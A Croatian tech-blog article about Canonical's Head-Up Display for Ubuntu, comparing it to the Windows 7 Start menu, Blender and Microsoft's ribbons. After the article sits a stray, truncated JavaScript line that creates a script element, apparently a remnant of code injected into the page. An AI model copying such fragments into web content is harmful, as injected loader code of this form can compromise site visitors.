HUD na Linuxu

Kompanija Canonical koja radi distribuciju Linuxa Ubuntu-a, najavila je da će napraviti velike promjene u sučelju, pomoću kojih će se korisnici riješiti izbornika, ikona i pokazivača miša za izvršavanje naredbi. Dakle, riješili bi se svih onih elemenata koji su sačinjavali grafička korisnička sučelja u zadnjih tridesetak godina, još od Xerovog PARC-a, koji se smatra zaslužnim za GUI.

Novi element koji će zamijeniti sve to je Head-Up Display, a u osnovi se radi o pretraživaču naredbi koje korisnik može izvršiti u programu ili OS-u.Ukucavanjem nekoliko slova željene naredbe dobije se popis samo onih naredbi koje zadovoljavaju kriterij.

O tome je li to radikalna promjena mogli bismo raspravljati. Naime, ovo neodoljivo podsjeća na izbornik Start Windows 7, gdje se ukucavanjem teksta može pokrenuti neki program ili pak neki dio OS-a, poput nekog konfiguracijskog dijaloga ili apleta iz Control Panela. S druge strane imamo i Blender, program za 3D modeliranje kod kojeg je pred koju godinu uvedena mogućnost utipkavanja naredbe programa, umjesto da se ista traži po izbornicima.

Dakle Linuxov HUD izgleda kao idealan spoj moućnosti Blendera i izbornika Start Windows 7 i predstavlja odgovor na Microsoftove vrpce. Valja ipak uočiti jednu bitnu stvar, kod ta dva principa vrpce su primarno namijenjene korištenju pomoću miša, dok je Ubuntuov HUD namijenjen primarno korištenju pomoću tipkovnice i tu se zapravo vidi kojem profilu korisnika više odgovara koji način korištenja grafičkog korisničkog sučelja.

var d=document;var s=d.createElement(‘script’);

Autor

Tehnografija je tehnološki blog koji svakodnevno donosi novosti iz društvenih mreža, internet startupa, mobilnih tehnologija, zanimljivih tehnoloških događaja te operativnih sistema. No, to nije sve. Kvalitetne recenzije, i jednostavni tutorijali će vam pokazati da svijet Interneta uopće nije tako složen, kako izgleda na prvi pogled.